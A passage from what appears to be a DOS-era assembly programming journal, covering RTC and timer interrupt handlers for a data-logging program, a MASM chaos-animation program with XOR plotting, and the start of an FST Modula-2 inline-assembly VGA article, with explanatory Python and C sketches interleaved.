---- End -------------------------------------------- EnableIRQ8 ----
Easy, isn't it? It took some nights to figure this out, 'cause the Intel
databooks are not that clear. I was glad to find some NEC databooks
since these shed some more light. In general, for older chips, NEC is a
good choice of databooks. They used to second source 80x86 chips for
Intel and are still known for the innovations they put into their V20
and V30 chips. The V25, a vastly improved 8088, was contaminated by 8
full banks of 14 registers. Luckily Intel did not copy this. What would
a 386 have been with 250 GP registers?
Here's the code for disabling IRQ8:
--- Begin ------------------------------------------ DisableIRQ8 ----
DisableIRQ8: ; disable IRQ 8 in 8259
push ax
in al, 0A1 ; get IRQ mask word
or al, bit 0
out 0A1, al ; disable IRQ 8
pop ax
ret
---- End ------------------------------------------- DisableIRQ8 ----
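Both routines do nothing more than clear or set one bit in the mask register of the second PIC. For other IRQ lines the same idea applies; the Python sketch below shows how the port and bit could be worked out, assuming the standard AT layout (mask registers at 21h and 0A1h). The function names are made up for this note.

```python
def pic_mask_location(irq: int):
    """Return (mask port, bit number) for an IRQ line 0..15."""
    if not 0 <= irq <= 15:
        raise ValueError("IRQ must be 0..15")
    return (0x21, irq) if irq < 8 else (0xA1, irq - 8)

def unmask(mask: int, bit: int) -> int:
    return mask & ~(1 << bit) & 0xFF      # and al, not bit n : enable

def mask_off(mask: int, bit: int) -> int:
    return (mask | (1 << bit)) & 0xFF     # or al, bit n      : disable

if __name__ == "__main__":
    port, bit = pic_mask_location(8)
    print(hex(port), bit, hex(unmask(0xFF, bit)))
```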
Asserting IRQ8 will make the PC generate an INT 70h. So, we need to have
an INT 70h handler ready:
--- Begin ------------------------------------------ NewIRQ8 --------
L0: mov [IrqCount], ax ; and store it
L1: mov al, 020 ; tell stupid PC that IRQ ends here
out 020, al ; EOI to original PIC
out 0A0, al ; EOI to cascaded PIC
pop ds, ax ; restore registers
iret ; and get out
NewIRQ8: push ax, ds
cs mov ds, [DataSeg] ; restore DS
mov al, 0C
out 070, al
in al, 071 ; clear interrupt flags
test [Flags], Running ; are we running?
jz L1 ; if not, get out
test [Flags], FastMode ; Samplerate over 128 Sps?
jz >L2 ; if not, scram
or [Flags], TimeOut ; else set TimeOut flag
jmp L1
L2: mov ax, [IrqCount] ; medium to slow samplerates
dec ax ; are we at correct value?
jnz L0 ; ... if not, wait some more
or [Flags], TimeOut ; ... if so, set TimeOut flag,
mov ax, [MaxCount] ; ... reload time constant register
jmp L0
---- End ------------------------------------------- NewIRQ8 --------
I like to do as little as possible in this kind of routine. In this
case I set a flag and rely on the abilities of the background program
to fork execution based on the state of that flag.
I hate the idea of having an INT routine that actually DOES things, but
which, for some obscure reason, cannot complete before the next INT
comes in. You'll be able to figure out what will happen in most cases.
If this routine sets a flag twice, I don't care too much. OK, I lose a
sample, but the program keeps running and it will still terminate when I
ask it to.
This routine:
- saves registers on the user-stack
- restores correct DS
- reads RTC register C to clear the interrupt flags
- accesses the Flags variable in memory
- consults these flags and acts upon them
- eventually reaches L1 and here an EOI is sent to the PICs
- pops the stored registers from the userstack
- returns with an IRET.
The PIC needs an EOI to enable lower priority interrupts. And since
there are two PICs in modern PCs, there also must be two EOIs.
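The flag logic of the handler is easy to try out away from the hardware. The Python function below is a sketch of one pass through NewIRQ8, with a dictionary standing in for the Flags, IrqCount and MaxCount variables; rtc_tick and the key names are invented for this model, and the port accesses are left out.

```python
def rtc_tick(state):
    """One pass through the handler's decision logic."""
    if not state["running"]:
        return                                   # jz L1 : not running, get out
    if state["fast_mode"]:
        state["timeout"] = True                  # every interrupt is a sample
        return
    count = (state["irq_count"] - 1) & 0xFFFF    # dec ax (16-bit register)
    if count == 0:
        state["timeout"] = True                  # time to take a sample
        count = state["max_count"]               # reload the time constant
    state["irq_count"] = count                   # L0 : store it

if __name__ == "__main__":
    state = {"running": True, "fast_mode": False,
             "irq_count": 4, "max_count": 4, "timeout": False}
    for tick in range(1, 9):
        rtc_tick(state)
        print(tick, state["timeout"])
        state["timeout"] = False                 # the main program's job
```

With MaxCount = 4 the TimeOut flag comes up on every fourth interrupt, which is how the slower sample rates are derived from the fixed interrupt rate.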
The following routine will enable the new IRQ8 handler:
--- Begin ----------------------------------- EnableNewIRQ8 ---------
EnableNewIRQ8: ; program the RTC chip to 1 kSps
push ax ; and enable the 8259 PIC, channel 8
mov al, 0C
out 070, al
in al, 071 ; check register C first
mov ah, 00100110xB
call SetPIRate ; set PI rate to 1 kSps
mov al, 0B
out 070, al
mov al, 01000010xB ; enable the RTC interrupt pin
out 071, al ; and store it in RTC register B
call EnableIRQ8 ; enable the 8259 PIController
pop ax
ret
---- End ------------------------------------ EnableNewIRQ8 ---------
And before going back to the OS of your choice, make sure no more IRQ8s
will be coming this way:
--- Begin ----------------------------------- ResetNewIRQ8 ----------
ResetNewIRQ8: ; restore default values in RTC
push ax ; and disable 8259 PIC, channel 8
mov al, 0A
out 070, al ; select register A
mov al, 00100110xB
out 071, al ; and set it back to PC default
mov al, 0B
out 070, al
mov al, 00000010xB ; disable interruptions from RTC chip
out 071, al ; via register B
call DisableIRQ8 ; handle the PIC
pop ax
ret
---- End ------------------------------------ ResetNewIRQ8 ----------
In the big program these code fragments are from, I use two timer
interrupts:
- the RTC timer is used for trigger-timing. When the RTC has set the
right flag, the main program will sample the ADC and store the
result in a buffer for later processing.
- the internal PC clock which generates the 55 ms timing signals is
used to set another flag. When this is set, the (DMM style) display
is updated. The bargraph display is updated 18 times per second and
the digital readout a little over twice per second (every 8th tick).
Therefore I also need a new IRQ0 handler:
--- Begin ------------------------------------------ NewIRQ0 --------
L0: pop ds ; restore register
jmp [cs:OldIRQ0] ; and update DOS clock
NewIRQ0: push ds ; new timer routine (18.2 Hz)
cs mov ds, [DataSeg] ; restore DS
test [Flags], Running
jz L0 ; if not running, eject!
inc [Counter] ; else increment counter,
or [Flags], RefrshBar ; indicate "bargraph refresh"
test [Counter], 07 ; twice per second,
IF Z or [Flags], RefrshDig ; indicate "digits update"
jmp L0 ; and get out
---- End ------------------------------------------- NewIRQ0 --------
This new routine does the following:
- check if the DMM is running,
- if not, it makes no sense to set any flags,
- if running, set the "update bargraph display" flag,
- if running, check if it is time to update the digital readout,
- restore DS register,
- branch to previous IRQ0 handler.
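To see what the "test [Counter], 07" line does to the update rates, here is a small Python sketch that counts the flag settings over a number of timer ticks. count_refreshes is a made-up name, and the tick rate is the usual 1193182/65536 Hz figure for the PC timer, which I am assuming applies here.

```python
TICK_HZ = 1193182 / 65536          # about 18.2 ticks per second

def count_refreshes(ticks: int):
    """Return (bargraph refreshes, digit refreshes) after a number of ticks."""
    counter = bars = digits = 0
    for _ in range(ticks):
        counter += 1               # inc [Counter]
        bars += 1                  # bargraph flag is set on every tick
        if counter & 7 == 0:       # test [Counter], 07 / IF Z ...
            digits += 1            # digits flag only on every 8th tick
    return bars, digits

if __name__ == "__main__":
    print(count_refreshes(182))            # roughly ten seconds worth of ticks
    print(round(TICK_HZ / 8, 2), "digit updates per second")
```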
In the initialisation routine, common to all my programs, I make sure
the right interrupt vectors are stolen:
--- Begin ------------------------------------------ Init -----------
init: call SetVars ; init most important variables
call PowDown ; make sure ADC is OFF
call ClkLo ; prepare ADC for power-up
call ChkTime ; measure minimum sample time
call MaxSps ; determine maximum sample speed
mov ah, 0F
int 010 ; determine existing video mode
mov [VidMode], al ; store it
mov ax, 012
int 010 ; set 640 x 480 graphics mode
push es
mov ax, 0351C ; get old timervector
int 021
mov w [OldIRQ0], bx
mov w [OldIRQ0+2], es
mov dx, offset NewIRQ0
mov ax, 0251C
int 021 ; install new TIMER routine
mov ax, 03570
int 021
mov w [OldClock], bx
mov w [OldClock+2], es
mov dx, offset NewIRQ8
mov ax, 02570
int 021 ; install NewIRQ8 routine
call EnableNewIRQ8 ; and get it to work
pop es
mov ax, 0
int 033 ; init mouse
ShowMouse ; this is a macro....
call FillScreen
or [Flags], RefrshBar + RefrPara + Upd8Digs
call ShowDig
call BrScale
call Update
ret
---- End ------------------------------------------- Init -----------
Not much to explain about this INIT routine I guess.
So, on to the EXIT part of the software. Forget this, and the computer
will hang at random times afterwards....
--- Begin ------------------------------------------ Exit -----------
exit: call PowDown
call ResetNewIRQ8
push ds
lds dx, [OldIRQ0]
mov ax, 0251C
int 021 ; restore timer vector
pop ds
push ds
lds dx, [OldClock]
mov ax, 02570
int 021 ; restore realtime clock vector
pop ds
mov ah, 0
mov al, [VidMode]
int 010 ; back to previous screenmode
mov ax, 0
int 033 ; reset mouse and -driver
mov ax, 04C00
int 021 ; and exit to DOS
---- End ------------------------------------------- Exit -----------
That's all you need to know to get started. The RTC chip has some nice
other possibilities. It can be programmed to interrupt each second. Or
any other number of seconds. It is a truly versatile chip with many
timing functions directly available to systems level programmers.
It might be a good idea to search the web for a datasheet. A good
starting point will be www.dalsemi.com where PDF files will be available
for all DS 1287 style chips. Or else from ftp.dalsemi.com. The latest
version of this chip that I know of is the DS 17887. This has a Y2K
compliant clock and over 8K of NV (=Non Volatile) RAM.
In the USA Dallas have an Automatic Datasheet FaxBack number:
972 - 371 4441
Have fun exploiting the RTC chip, but be prepared to hit the reset
button now and then. Also, make a backup of the CMOS battery-backup RAM
onto a floppy disk! You'll have corrupted or erased these data before
you know it and it's always a bit of a shock if the system cannot even
find the C: drive anymore....
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Chaos Animation
by Laura Fairhead
To assemble this program you are going to require most of the library
routines I have so far presented here. You can consider this an example
of just how easy it is to write software in assembler if you continue
to build and refine a library system. The program probably took me about
half an hour of work and most of that was making myself satisfied with
the niceness of the code:-
;issue #5
INCLUDE NUCONV.ASM
;issue #6
INCLUDE SCANU.ASM
;issue #7
;scalst list scanner
INCLUDE SCAWS.ASM
;random number generator
INCLUDE RAND.ASM
;ASM building blocks
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM
Overview
~~~~~~~~
This is a simple but endearing graphical animation miniature that
is based on the iterative function:-
x' = x*x + y + a
y' = b - x
Where a,b are constants, x,y are old coordinates and x',y' are the
new ones. All values are taken to be in [0,1). That is, the operations
are all performed modulo 1.
If you haven't covered this in mathematics yet it is quite simple,
your function mod1 would be:-
mod1(x) = x - int(x)
This can all be done nicely within the bounds of 32-bit values,
simply view the binary point as being just before the MSbit.
We only really have 4 values to keep since x',y' are the next x,y.
kaa EQU kaera+1
kab EQU kaa+4
kax EQU kab+4
kay EQU kax+4
The EQU's at the program end are defining offsets for uninitialised
data that lies in the primary code segment. Here we have kaa<->a, kab<->b,
kax<->x, kay<->y
;EAX=x
MOV EAX,DWORD PTR DS:[kax]
;EBX=b
MOV EBX,DWORD PTR DS:[kab]
;EBX=b-x =y'
SUB EBX,EAX
;ECX=y' for later use
MOV ECX,EBX
;EBX=y, y'->y (didn't I say XCHG is useful!)
XCHG EBX,DWORD PTR DS:[kay]
;EBX=y+a
ADD EBX,DWORD PTR DS:[kaa]
;EDX:EAX=x*x
;high dword is the first 32 b.p's....
MUL EAX
;EBX=x*x+y+a =x' (how much of the pattern is due to loss of accuracy here?)
ADD EBX,EDX
;x<-x'
MOV DWORD PTR DS:[kax],EBX
Reasonably efficient, and we come out with the x,y coordinate pair
also in EBX,ECX.
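For anybody who wants to check the fixed-point arithmetic without an assembler to hand, here is the same step as a Python sketch. Values are 32-bit integers with the binary point just before the MSbit, so masking with FFFFFFFFh is the "modulo 1"; the name chaos_step is made up for this note.

```python
MASK = 0xFFFFFFFF                  # 32 binary places, value = n / 2**32

def chaos_step(x, y, a, b):
    """One iteration: x' = x*x + y + a, y' = b - x, all modulo 1."""
    new_y = (b - x) & MASK                      # SUB EBX,EAX
    square_hi = (x * x) >> 32                   # MUL EAX, keep EDX only
    new_x = (square_hi + y + a) & MASK          # ADD EBX,[kaa] / ADD EBX,EDX
    return new_x, new_y

if __name__ == "__main__":
    x, y = chaos_step(0x80000000, 0, 0, 0)      # x = 0.5, everything else 0
    print(hex(x), hex(y))
```

Like the assembler version, this throws away the low dword of the square, so it reproduces the same loss of accuracy.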
To jazz things up a little, instead of the basic idea:-
(i) set some random x,y,a,b
(ii) do our function on the x,y,a,b
(iii) plot point on the screen representing x,y
(iv) go back to (ii)
We implement a "trail". This is basically where we keep a store of
the last so many points drawn (remember that classic WORM game??).
Then one end is added to and the other is deleted from. Points are all
plotted with XOR, especially since doing a second XOR will erase a
plotted point (so there is no erase routine).
Furthermore for every point, 4-reflections of the point are plotted
to the screen. This gives you symmetry for free.
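The trail idea can be sketched in a few lines of Python, with a set of lit pixels standing in for the screen and a deque standing in for the point store. The names run_trail and xor_plot are invented here, and the real program of course works on video memory rather than a set.

```python
from collections import deque

def run_trail(points, trail_len):
    """Plot points with XOR, keeping only the newest trail_len of them lit."""
    lit = set()
    trail = deque()

    def xor_plot(p):
        # XOR plotting: a second plot of the same point erases it
        if p in lit:
            lit.remove(p)
        else:
            lit.add(p)

    for p in points:
        xor_plot(p)                      # add to the head of the trail
        trail.append(p)
        if len(trail) > trail_len:
            xor_plot(trail.popleft())    # the same routine erases the tail
    return lit

if __name__ == "__main__":
    print(sorted(run_trail([(0, 0), (1, 1), (2, 2)], trail_len=2)))
```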
The plot routine
~~~~~~~~~~~~~~~~
I'm going to first explain the plot routine before going into the
main code body. I had some fun writing it, but it also illustrates some
important points.
We are using mode 011h. This is 640x480x2, ( 0280hx01E0h )
With mode 011h you have of course only the one plane. You've got
bytes from +00h to +04Fh on each row representing 8-bit pixel groups.
So given an x coordinate you need to take the 2 parts:-
offset =x SHR 3
bit =x AND 7
The y coordinate is just the one part, the offset:-
offset =y *050h (row=050h bytes)
Now of course it is plain to see that the offset is simply the result
of multiplication by 5 and then shift left 4. (unless you work always in
decimal, ala 050h=5*010h)
Oh, I LOVE the x86:-
LEA SI,[EDX*4+EDX]
This puts DX*5 straight into SI. That's about 5 operations all in one
go:)
So then SI is shifted 4 left and the resultant offset y*050h is the y
component of the offset on screen of the pixel we want to plot.
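As a cross-check of the address arithmetic, here is a small C sketch. The
function names are invented for this illustration; the only facts taken from
the text are the 050h-byte rows, the multiply-by-5-then-shift trick, and the
use of the low three bits of x as the bit position inside the byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* y * 050h computed as (y*5) << 4, mirroring LEA SI,[EDX*4+EDX] / SHL SI,4 */
unsigned row_offset(unsigned y)
{
    return (y + (y << 2)) << 4;
}

/* Byte within the row: x SHR 3 */
unsigned column_byte(unsigned x)
{
    return x >> 3;
}

/* Bit within the byte: bit 7 is the leftmost pixel of the group of 8 */
uint8_t pixel_mask(unsigned x)
{
    return (uint8_t)(0x80u >> (x & 7u));
}

/* Full offset of pixel (x,y) from the start of the screen segment */
size_t pixel_address(unsigned x, unsigned y)
{
    assert(x < 640 && y < 480);
    return (size_t)row_offset(y) + column_byte(x);
}
```

For example, pixel (11,2) lives in byte 2*050h+1 = 0A1h, under mask 010h.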
The routine keeps the x/y components apart because we want to plot
(x,y) (-x,y) (-x,-y) (x,-y). And as soon as they are put together for
one they need to be disassembled/reconstructed for the next.
The x component, which is always in BX, is obviously created with
a shift right 3, however we first have to rescue the least significant
3 bits. They give the bit in the byte.
MOV CL,BL
MOV AX,0180h
ROR AL,CL;ROL AH,CL
Here I am getting AL with the bit set that corresponds to the pixel
on screen. AH is being set up the opposite way around. Think of the screen
as four quadrants:-
|
x+ | x-
y+ |
|
-----------+-------------
|
|
y- |
|
|
If our point starts in the x+y+ quadrant, we have the values to
draw that:-
( SHR BX,3 )
XOR [SI+BX],AL
Now to reflect the point x-wise, so it goes to x-y+, you only need
to get the x offset = 04Fh-x. Well x86 lets you do powerful things,
we don't need to mess; just negate BX to get the -x and add the 04Fh
in as a displacement. Of course the bit offset gets negated as well,
which is exactly why we have the two opposite masks in AL/AH:-
NEG BX;XOR [SI+BX+04Fh],AH
Next y is reflected, so we go to -x-y. This is the same thing
again, only the y coordinate will only affect the offset:-
NEG SI;XOR [SI+BX+04Fh+01DFh*050h],AH
And finally to +x-y:
NEG BX;XOR [SI+BX+01DFh*050h],AL
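The four XORs can be written out in C against a plain byte array standing in
for the screen. This is a sketch under that assumption; plot4 and the enum
names are made up, and the buffer must be at least 050h*01E0h bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { ROW_BYTES = 0x50, LAST_COL = 0x4F, LAST_ROW = 0x1DF };

/* XOR-plot (x,y) and its three reflections into a 640x480x1 buffer. */
void plot4(uint8_t *fb, unsigned x, unsigned y)
{
    assert(fb != NULL && x < 640 && y < 480);

    unsigned col        = x >> 3;                     /* SHR BX,3          */
    unsigned row        = y * ROW_BYTES;              /* SI                */
    unsigned mirror_row = (LAST_ROW - y) * ROW_BYTES; /* NEG SI + 01DFh*050h */
    uint8_t  al = (uint8_t)(0x80u >> (x & 7u));       /* ROR AL,CL         */
    uint8_t  ah = (uint8_t)(0x01u << (x & 7u));       /* ROL AH,CL         */

    fb[row + col]                   ^= al;            /* ( x,  y) */
    fb[row + LAST_COL - col]        ^= ah;            /* (-x,  y) */
    fb[mirror_row + LAST_COL - col] ^= ah;            /* (-x, -y) */
    fb[mirror_row + col]            ^= al;            /* ( x, -y) */
}
```

The mirrored mask in AH is what keeps the reflection exact: pixel 3 of byte 0
maps to pixel 4 of byte 04Fh, i.e. x=3 becomes x=636=639-3.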
Notes
~~~~~
During the program run you can press any key to set different values
for the chaos function. Press ESC to abort. On abortion a message will
give you 2 hex d-words, these are the random number seed that generated
the last pattern you were watching. To see it again simply record the
values and invoke the program with the values on the command line:-
(ESC abort)
random seed=01234567 FEDCBA98 (program output)
KAOS 01234567 FEDCBA98 (invoke program with seed as parameter)
(chaos pattern displayed is the same as the one broken out of)
The code is left undelayed and as such it may run too fast on a fast
machine. The optimum speed is for it to be only slightly over-fast. If
you want to achieve this you should add some sort of delay loop in.
Alternatively just get out your old 386 and give it some work to do.
Code is, as usual, in MASM format. Assemble to a COM file.
========START OF CODE======================================================
OPTION SCOPED
OPTION SEGMENT:USE16
.486
stksiz EQU 0400h ;stack size
kadatx EQU 0C00h ;#points length of trail
cseg SEGMENT BYTE
ASSUME NOTHING
ORG 0100h
kode PROC NEAR
;initialise, allocate memory and stack
CLD
MOV AH,04Ah
MOV BX,OFFSET endof+0Fh
SHR BX,4
INT 021h
JC errmem
MOV SP,OFFSET stk+stksiz
;zero-terminate command line to facilitate
;parsing
MOV SI,080h
LODSB
CBW
XCHG BX,AX
MOV [BX+SI],BH
;any parameters given?
CALL NEAR PTR scaws
CMP AL,0
JZ SHORT ko0
;yes, so read 2 dwords as random seed
MOV DI,OFFSET rndn
MOV AL,010h
CALL NEAR PTR scanur
CALL NEAR PTR scanu
JNA erripa
STOSD
CALL NEAR PTR scaws
CALL NEAR PTR scanu
JNA erripa
STOSD
JMP SHORT ko1
;no, so set random seed from system time
ko0: CALL NEAR PTR rndseed
ko1:
lop2:
;set mode 011h, fade grey background
MOV AX,011h
INT 010h
MOV EAX,040404h
MOV BL,0
CALL NEAR PTR spal
;save random seed so that kaos params can be restored
;by user
MOV SI,OFFSET rndn
MOV DI,OFFSET seed
MOVSD;MOVSD
;set random params for function
MOV DI,OFFSET kaa
MOV CX,4
lop1:
CALL NEAR PTR rndgen32
STOSD
LOOP lop1
;initialise for plot trail
; [kaera]=0 on the first pass of the store
; [kaera]=-1 thereafter
; [kaoff]=offset of store pointer
MOV BYTE PTR DS:[kaera],0
MOV WORD PTR DS:[kaoff],OFFSET kadat
lop0:
;iterate x,y
; x'=x*x+y+a
; y'=b-x
MOV EAX,DWORD PTR DS:[kax]
MOV EBX,DWORD PTR DS:[kab]
SUB EBX,EAX
MOV ECX,EBX
XCHG EBX,DWORD PTR DS:[kay]
ADD EBX,DWORD PTR DS:[kaa]
MUL EAX
ADD EBX,EDX
MOV DWORD PTR DS:[kax],EBX
;x,y scale to screen bounds
; gets the x,y [0,1) values into screen coordinate pair (BX,DX)
SHR EBX,12
LEA EBX,[EBX*4+EBX]
SHR EBX,13
MOV EDX,ECX
SHR ECX,4
SUB EDX,ECX
SHR EDX,23
;do point
; [kaera] is -1 on and after the store had become full for the first
; time
MOV DI,WORD PTR DS:[kaoff]
TEST BYTE PTR DS:[kaera],-1
JZ SHORT ko3
;unplot trail end point
PUSH BX
PUSH DX
MOV BX,[DI]
MOV DX,[DI+2]
CALL NEAR PTR plo4
POP DX
POP BX
;current position is saved in store
ko3: MOV AX,BX
STOSW
MOV AX,DX
STOSW
;store ptr incremented wrapping at the end
CMP DI,OFFSET kadat+kadatx*4
JNZ SHORT ko4
MOV DI,OFFSET kadat
OR BYTE PTR DS:[kaera],-1
ko4: MOV WORD PTR DS:[kaoff],DI
;current position is plotted
CALL NEAR PTR plo4
;user
; ESC aborts, any key sets a new function going
MOV AH,0Bh
INT 021h
CMP AL,0
JZ lop0
MOV AH,7
INT 021h
CMP AL,01Bh
JNZ lop2
;display random seed value and terminate
MOV SI,OFFSET t0
CALL NEAR PTR pstr
MOV EAX,02083010h
CALL NEAR PTR nuconvs
MOV SI,OFFSET seed
;those instructions at the program start are never going to be
;executed again so use them as a temp workspace instead of kadat
;which could possibly be dangerous if somebody EQU's kadatx to
;some low value
MOV DI,0100h
PUSH DI
LODSD
CALL NEAR PTR nuconv
MOV AL,020h
STOSB
LODSD
CALL NEAR PTR nuconv
MOV AL,0
STOSB
POP SI
CALL NEAR PTR pstrcr
;screen mode is not put back to 02h you may wish to add
;a MOV AX,2;INT 010h here however I left it out because I
;see way too much of that mode
;program termination
terminat0:
MOV AL,0
terminat:
MOV AH,04Ch
INT 021h
;error aborts
erripa:
MOV SI,OFFSET terripa
MOV AL,2
JMP SHORT err
errmem:
MOV SI,OFFSET terrmem
MOV AL,1
err:
PUSH SI
MOV SI,OFFSET terr
CALL NEAR PTR pstr
POP SI
CALL NEAR PTR pstrcr
JMP terminat
terr: DB "ERROR: ",0
terrmem:
DB "memory allocation failure",0
terripa:
DB "invalid parameter format",0
;program text (in its entirety)
t0: DB "random seed=",0
kode ENDP
;plo4- 4-way plot routine for mode 011h
;
; plots 4 reflections of a single point on the mode 011h
; screen these are (x,y) (-x,y) (-x,-y) (x,-y)
;
; plots using XOR
;
;entry: BX,DX=x,y coordinates
;
;exit: SI,CL,AX,BX destroyed
plo4 PROC NEAR
PUSH DS
;screen segment 0A000h
; for further comment please refer above
PUSH 0A000h
POP DS
LEA SI,[EDX*4+EDX]
SHL SI,4
MOV CL,BL
MOV AX,0180h
ROR AL,CL
ROL AH,CL
SHR BX,3
XOR [SI+BX],AL
NEG BX
XOR [SI+BX+04Fh],AH
NEG SI
XOR [SI+BX+04Fh+01DFh*050h],AH
NEG BX
XOR [SI+BX+01DFh*050h],AL
POP DS
RET
plo4 ENDP
;if you don't like my fade grey background you can delete this and
;the line that invokes it. However this is also the next library
;routine, so do cut/paste it into a file it will be used in future
;articles.
;spal- set VGA DAC register via hardware
;entry: EAX=XXGGBBRR (hex of course)
;
; RR=red component
; BB=blue component
; GG=green component
;
; don't forget that these values are <=03Fh
;
; BL=DAC register to set
;
;
;exit: (all registers are preserved)
spal PROC NEAR
;the code here is straightforward so I shall add no comment apart
;from a small moan:( I have used direct hardware access instead
;of the BIOS calls to affect the palette since square one, I'm
;not unreasonable in my desire to program the hard-metal of the machine,
;however the quality of the BIOS graphics routines is absolutely
;despicable. If you've ever tried using them you will know what I'm
;talking about.
;
PUSH EAX
PUSH DX
MOV DX,03C8h
CLI
XCHG BX,AX
OUT DX,AL
INC DX
XCHG BX,AX
OUT DX,AL
SHR EAX,8
OUT DX,AL
SHR EAX,8
OUT DX,AL
STI
POP DX
POP EAX
RET
spal ENDP
;library routines
INCLUDE RAND.ASM
INCLUDE SCAWS.ASM
INCLUDE SCANU.ASM
INCLUDE NUCONV.ASM
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM
;data
kaoff EQU $ ;(w) offset of trail store pointer (absolute)
kaera EQU kaoff+2 ;(b) flag indicating 1st trail pass
kaa EQU kaera+1 ;(dw) a
kab EQU kaa+4 ;(dw) b kaos function parameters
kax EQU kab+4 ;(dw) x
kay EQU kax+4 ;(dw) y
kadat EQU kay+4 ;(*) store space for trail data
seed EQU kadat+kadatx*4 ;(qw) copy of initial random number seed
stk EQU seed+8 ;(*) stack space
endof EQU stk+stksiz ;[endofprogram]
cseg ENDS
END FAR PTR kode
========END OF CODE========================================================
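The "x,y scale to screen bounds" step in the listing above is worth a second
look, since it maps a 32-bit fraction onto 640 columns and 480 rows using
only shifts, one LEA and one SUB. A C sketch of the same arithmetic follows;
scale_x and scale_y are names invented here, and the inputs are assumed to
be the raw unsigned dwords held in EBX and ECX at that point.

```c
#include <assert.h>
#include <stdint.h>

/* x * 640 / 2^32, done as ((x >> 12) * 5) >> 13, since 640 = 5 * 2^7 */
unsigned scale_x(uint32_t x)
{
    uint32_t t = x >> 12;        /* keep the top 20 bits               */
    t = t * 5u;                  /* LEA EBX,[EBX*4+EBX]                */
    unsigned px = t >> 13;
    assert(px < 640u);           /* always holds for 32-bit input      */
    return px;
}

/* roughly y * 480 / 2^32, done as (y - y/16) >> 23, since 480 = 15 * 2^5 */
unsigned scale_y(uint32_t y)
{
    return (y - (y >> 4)) >> 23;
}
```

One detail this makes visible: with the formula as written, the single input
0FFFFFFFFh gives a y of 480, one row past the bottom of the screen, while
every other input stays within 0..479.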
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Inline Assembler With Modula
by Jan Verhoeven
I don't want to start a compiler-war in the assembler programmer's journal,
but I do want to show some nice in-line assembly routines for FST Modula-2.
FST (Fitted Software Tools) was a shareware Modula-2 compiler made by Roger
Carvalho. He eventually gave up the concept of shareware and made his final
version freeware. If you look carefully you can find this package in many
software repositories like Simtel. Also the FreeDOS website used to harbor
this final version.
For this Modula-2 compiler I used my VGA routines (see previous issues) and
some in-line assembly to give this compiler a way to do graphics modes.
I uploaded the full sources to SimTel some months (or years?) ago, so if you
would like to have a detailed look at it, go there and look for it.
Modula-2 is despised by many, but it is the most structured language ever
made. And that's also probably the reason why most coders refuse to use it.
You must follow the compiler, whatever you do. A high price, but the result
is that Modula-2 programs seldom crash. They can bail out in the middle of
the program, but they will not hang due to a pointer or indexing error.
Anyway, here's my addition to this marvelous language:
---------------------------------------------------------------------------
IMPLEMENTATION MODULE VgaLib;
PROCEDURE SHL (x, y : CARDINAL) : CARDINAL; (* Shift left x, y bits. *)
VAR result : CARDINAL;
BEGIN
ASM
MOV AX, x
MOV CX, y
AND CX, 15 (* Mask off lower nybble *)
JCXZ ok (* Get out if no shift. *)
SHL AX, CL
ok: MOV result, AX (* Store result. *)
END;
RETURN result;
END SHL;
---------------------------------------------------------------------------
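For comparison, the behaviour of this SHL procedure can be sketched in C.
The name shl16 is made up here, and CARDINAL is assumed to be a 16-bit
unsigned value, as the use of AX suggests.

```c
#include <assert.h>
#include <stdint.h>

/* Shift a 16-bit value left by (y AND 15) bits, dropping bits shifted out. */
uint16_t shl16(uint16_t x, unsigned y)
{
    unsigned count = y & 15u;              /* AND CX, 15                   */
    assert(count < 16u);
    return (uint16_t)((unsigned)x << count);
}
```

Because the count is masked, asking for a shift of 16 behaves like a shift
of 0 rather than clearing the value.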
The only "drawback" is that the in-line code must be 8088 style. So you
won't be able to use MMX instructions, but almost no-one ever needs those.
FST Modula-2 offers direct access to (values of) variables. Neat. Makes the
in-line feature very convenient to use.
---------------------------------------------------------------------------
PROCEDURE SetColour (Colour : CHAR); (* Define colour to work with. *)
BEGIN
ASM
MOV DX, 03C4H (* VGA sequencer index port *)
MOV AH, Colour (* plane mask, goes to data port 03C5H *)
MOV AL, 2 (* index 2 = map mask register *)
OUT DX, AX
END;
END SetColour;
---------------------------------------------------------------------------
Compare the following routine with the one I entered for the VGA-12h code in
A86 assembly language format. There's some Modula-2 overhead, but the actual
plotting is done in ASM, for speed-reasons.
---------------------------------------------------------------------------
PROCEDURE Plot (VAR InWin : WinData); (* Plot point on CurX, CurY. *)
VAR x, y : CARDINAL;
BEGIN
x := InWin.CurX + InWin.TopX;
y := InWin.CurY + InWin.TopY;
ASM
MOV AX, 0A000H
MOV ES, AX (* Set up segment register *)
MOV CX, x
AND CX, 7 (* Which bit to plot? *)
MOV AH, 80H
SHR AH, CL (* Compose plotting mask *)
MOV AL, 8
MOV DX, 03CEH
OUT DX, AX (* Set plottingmask *)
MOV AX, y (* Calculate offset in Video RAM *)
MOV BX, AX
ADD AX, AX
ADD AX, AX
ADD AX, BX (* AX := 5 * Y *)
MOV CL, 4
SHL AX, CL (* AX := 16 * 5 * Y *)
MOV BX, x
SHR BX, 1
SHR BX, 1
SHR BX, 1
ADD BX, AX (* plus X / 8 *)
MOV AL, ES:[BX]
MOV AL, 0FFH
MOV ES:[BX], AL (* and plot it *)
END;
END Plot;
PROCEDURE DrawH (VAR InWin : WinData; Flag : BOOLEAN);
(* Draw a horizontal line from CurX, CurY for DeltaX pixels. *)
VAR Index, Stop, x, dx, y, Kval : CARDINAL;
Emask, Lmask, Val : CHAR;
BEGIN
IF Flag THEN (* Flag = TRUE => Plot, else UnPlot *)
Val := 0FFX;
ELSE
Val := 0X;
END;
IF InWin.DeltaX < 18 THEN
FOR Index := 0 TO InWin.DeltaX DO (* For short lines *)
Plot (InWin);
INC (InWin.CurX);
END;
ELSE
x := InWin.TopX + InWin.CurX; (* For long lines *)
y := InWin.TopY + InWin.CurY;
dx := InWin.DeltaX;
ASM
